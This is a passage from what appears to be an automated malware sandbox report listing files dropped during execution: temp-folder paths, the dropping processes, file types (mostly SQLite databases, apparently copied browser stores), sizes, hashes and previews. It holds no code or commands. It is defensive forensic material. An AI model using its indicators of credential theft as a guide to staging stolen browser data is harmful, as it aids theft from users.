                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\muSPteJvyS

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\mzV6l9rhYS

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\n148ZpNIwb

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\nfSmwhTbXy

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\oH1Zi8eQpO

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\oT8YCJXKiH

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\oTNR3NCeY8

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\ocfPDs7SCW

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\oqFl7XSvEv

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\oqSAh98IIa

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\ot8MrpoeVM

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\p1jpowXL9D

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\pF64I8skJp

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\peMVqYm51i

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\pgeYHh0N2I

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\pkQbDyGAAg

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\pwL7dW8qS0

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\qPf8SkqAM6

                                                                    Download File
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):25
                                                                    Entropy (8bit):4.083856189774724
                                                                    Encrypted:false
                                                                    SSDEEP:3:alaWrdQn/C:WaWrdy/C
                                                                    MD5:A1A4760588A5D2F0E0BE0F73E67FBB42
                                                                    SHA1:8A102BD0D596A414EC3081ECB8E4AD698E849C2C
                                                                    SHA-256:110053A572D3B302F45F7FAA313A7F4844039791AEFD9101EC3849ADF99EF5F7
                                                                    SHA-512:FC28776AB48617308027C814C51BE80E98A16D054F42A08E70596FB09BC6AB97DA2F4F4559DC9DC36D236DE5E84CB321751320019240CEAF5439064ADA737B3F
                                                                    Malicious:false
                                                                    Preview:48Crrqo0gnv2mVSEvjvx5BVvg

                                                                    C:\Users\user\AppData\Local\Temp\qu7Zk5KLvp

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\quJ5hvCJ5e

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\rHMkHIQnvJ

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\rmYIDLW3q4

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\s2pfPl33NQ

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
